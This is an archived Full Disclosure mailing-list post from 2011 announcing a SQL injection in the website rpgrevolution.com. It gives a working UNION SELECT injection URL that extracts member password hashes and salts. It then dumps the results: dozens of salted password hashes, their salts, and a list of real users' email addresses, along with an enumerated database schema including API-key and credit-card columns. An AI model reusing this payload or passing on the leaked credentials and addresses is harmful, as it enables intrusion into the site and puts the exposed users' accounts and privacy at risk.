Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

rpgrevolution.com SQL Injection
From: Bob Smith <bobbyhadababyitsaboy () googlemail com>
Date: Thu, 13 Jan 2011 20:07:38 -0600

/home/rpgrev/domains/rpgrevolution.com/public_html/

http://www.rpgrevolution.com/games.php?platform=all&genre=aaaaaaaaaaaaaaaaaaaaaaa&apos;
union select 
1,user(),group_concat(converge_id),group_concat(converge_pass_salt),5,6,group_concat(converge_pass_hash),8,9,10,11,12,13,14,15
from ibf_members_converge-- -&list=desc&limiter=10&order=id

Salted

63217a559a7be4704156457c633c3344,4164d790f0047fc513b66ae1897bd6f2,16bd17aa7cb278c5520b021838a84a97,fe1d2c340c644126ba041bf0e97b7626,4263acb3502f6398ceb3841aa597fc5b,1da97968c870b5e8f4f8bd8897818056,5d9d9fa96b96c6c65b0673574a35453a,3f2e95b48762eb5b05f2424cfa80892a,6be4fb54d289d423ad69d9ef9b644156,731860ca22a89f0892a167f2afc81fa5,0b554ca29560318413f628347f46739b,07f2abe0dd2f40f0645e516f0f99325f,5f6ca10a7f1b0161acec092e4bee3c3c,1f2f49e8cf15428c350d96e2c2657d8b,c3d4f999324da31ee27cded6f9afde82,8787496111945c44e9d1bf62c43f9a40,5eaa772f28ca4c5832b997a6d24eb583,7e0e12c300b74661b6d6af08061d9363,0b2b5b1fb0dd8741328306b11166db63,57701c03e318d9fd39c56770b5f8a690,3dc61c20f521ead4381f02d9e99a0f46,e4a109ad7f09f3592b66c1ff3bce757b,562cd66fb31032973b116c4f5e9d01ac,a1815b2be6045fb98d850b96f0826ea3,d5234683d52606e67c9892c848a27eef,d2944383a1a72ae25b1dc49099ce0fa8,e161df49ddeda84829f2dd450a787632,d5be51ebf16f3768e52ca3ce7dc8372e,4a810955d9c4d9c956c14e8870c88338,615019960314d071fea6c37eaf363dca,
 67539a45a48399e929963918277ab37f

Corresponding Salt

lNF@,,av7 () 
e,zm?m/,~>H;<,EKu(h,#Z/q;,q$[Qc,9D.e},C|@;Z,E;hhO,eIG,u,+4Vqb,)p%/},q:Z{T,W'.Tj,THvsH,_f|+g,b[3tA,4%BuP,4n^n6,P(/.e,VliRl,xfA%a,U9Rce,C-JY3,qgoB~,|9P3Q,W],*`,$]S+G,Pz_Fw,:y@/,,5.LMi,>r1d?,krR)@,70=1|,}}~rI,|Hr[f,Xz)Db,KvXc^,h9'F},~J)er,J/QNO,F*I*O,43fh2,B3lLg,r|zjv,:mZ>j,MpLdR,$ScWu,MC7S[,F.LS.,xVToc,#vj?(,(5-R+,E:?p7,<8Mi{,s/%Z8,wb*zC,2W0Ag,H]%~{,68wdx,z3"Q),^Ir#6,girRW,xhd#j,d8`_x,]:9_z,-n3^b,L3z`0,U,~Jy,]{}:^,4+4<`,HdJ?B,uDjFw,%1MZF,q4{-N,w%d/:,9UXJ{,+2up5,V
 () 
Xul,L]M/5,G/&Vg,tZB<U,O}Wiu,pWy45,G:tw=,Ii%*9,PAstq,^J-O-,`9VS0,5pU}f,00|vf,B9*Td,jHrs=,lxEp3,?d#3J,@Lv2,,&]]R8,piB07,n3{(U,&oNQC,I8-*@,7H+b9,5tAce,RMJNT,aj%Wq,zru'0,cN%^m,u7
 () f4,P%/==,-IH/U,$iI8%,xp?NY,NAzQ9,=h.Xi,_n7P=,8IMKh,ej<]x,ZuWFg,oEe () 
1,n<^"],K!~[&,B|!{=,Gq9vP,7.-jc,i=c]q,"]']$,7I;]K,)zydA,v$/o?,`'z^f,`ug!),Mh+SM,]T,k9,x^T-!,U&.>M,Y51Vn,;@TW1,_]^H:,v^'E.,1_:;+,{ovD.,lF"^|,y`:v^,Gd4h|,Ju`/C,1UV/l,1J'*G,0m86q,qq!Xf,]S8h(,GWsR(,g[1<R,h#gGW,@?ecm,%oR&l,PA7K`,C3$*},@<dA@,]G83D,&;oJ<,hU)q{,T=}W~,5Nad],gI
 () eS,
 MVA{D,%D`*M,JvDx[,.=&_E,Q>PLx,hlu4

minsu86 () gmail com,cooldude2k () gmail com,sir.shaun () gmail com,psychoantwon () gmail com,jcink2k () gmail 
com,jonathan.pandgir () gmail com,renee2k () gmail com,stepan_par () msn com,webmaster () mvpmrd zzn com,kumihosan () 
gmail com,josemmm () terra com br,riou () mygen24 com,ruze8890 () gmail com,ivan_polanco18 () hotmail com,gary () 
hipdev com,diana_sexylady () hotmail com,saboor_ryu () hotmail com,gf () nana co il,unconformist () gmail com,renate2k 
() gmail com,xsilverblade () msn com,knigt2 () hotmail fr,theomen9mm () hotmail com,eleven11 () mail com,klein.99 () 
gmail com,nickctm () gmail com,game_boi_sp () hotmail com,when_is_now () hotmail com,tiggerville2929 () gmail 
com,cyferki () o2 pl,guardian_drayal () hotmail com,hitman19 () t-online de,jayce () divinelegy com,crprince () telus 
net,jellyman () charter net,jellydude3443 () yahoo com,ultrapokemaniac () yahoo com,nukehunter () hotmail 
com,hawkfire01 () hotmail com,kekko90 () aliceposta it,bballtj93 () verizon net,zamual05 () msn com,memorym () walla co 
il,quickcutthroat () yahoo com,drew_samuelsen () hotmail com,cecilvanhelsing () gmail com,fresc
 o_dewidt () hotmail com,

access, -- userid,forumid,accessmask
article,
download,
download_cats,
game_cats,
game_comments,
game_downloads,
game_reviews,
game_votes,
games, -- id,title,developer,date,desc,platform,genre,status,url,feat,view,user,rating,downloads,approve
ibf_acp_help,
ibf_admin_login_logs,
ibf_admin_logs,
ibf_admin_permission_keys,
ibf_admin_permission_rows,
ibf_admin_sessions,
ibf_ahreports,
ibf_ahreports_addons,
ibf_ahreports_adminmsg,
ibf_ahreports_cats,
ibf_ahreports_comments,
ibf_ahreports_communicate,
ibf_ahreports_status,
ibf_announcements,
ibf_api_log,
ibf_api_users, --api_user_id,api_user_key,api_user_name,api_user_perms,api_user_ip
ibf_arcade_acthistory,
ibf_arcade_actihis,
ibf_arcade_activity,
ibf_arcade_cats,
ibf_arcade_challengeps,
ibf_arcade_challenges,ibf_arcade_news,ibf_arcade_scoreboard,ibf_arcade_sessions,ibf_arcade_sitngo,ibf_arcade_sitngo_plyers,ibf_arcade_tartemp,ibf_attachments,ibf_attachments_type,ibf_badwords,ibf_banfilters,ibf_bulk_mail,ibf_cache_store,ibf_cal_calendars,ibf_cal_events


ibf_validating
ibf_members_converge-converge_id,converge_email,converge_joined,converge_pass_hash,converge_pass_salt
ibf_members_partial
ibf_members-id,name,mgroup,email,joined,ip_address,posts,title,allow_admin_mails,time_offset,hide_email,email_pm,email_full,skin,warn_level,warn_lastwarn,language,last_post,restrict_post,view_sigs,view_img,view_avs,view_pop,bday_day,bday_month,bday_year,new_msg,msg_total,show_popup,misc,last_visit,last_activity,dst_in_use,view_prefs,coppa_user,mod_posts,auto_track,temp_ban,sub_end,login_anonymous,ignored_users,mgroup_others,org_perm_id,member_login_key,member_login_key_expire,subs_pkg_chosen,files,downloads,points,deposited,auto_collect,last_collect,extra_interest,creditcard,show_in_staff,has_blog,members_auto_dst,members_cache,members_disable_pm,members_display_name,members_created_remote,members_editor_choice,members_markers,arcade_gtype,arcade_sess_gid,arcade_sess_start,arcade_b_challenges,arcade_usepm,arcade_challenge_banned,arcade_challengeid,arcade_challenge,arcade_u_cha,arcade_session,arcade_time_spent,user_r_pp,jackpots_won,jackpots_points,arcade_won,arcade_spent,arca
 de_activity,arcade_activitywon,user_u_columns,


ibf_sessions-id,member_name,member_id,ip_address,browser,running_time,login_type,location,member_group,in_error,in_dldo,in_dlcat,in_dlfile,location_1_type,location_1_id,location_2_type,location_2_id,location_3_type,location_3_id,in_game

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
  • rpgrevolution.com SQL Injection Bob Smith (Jan 14)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault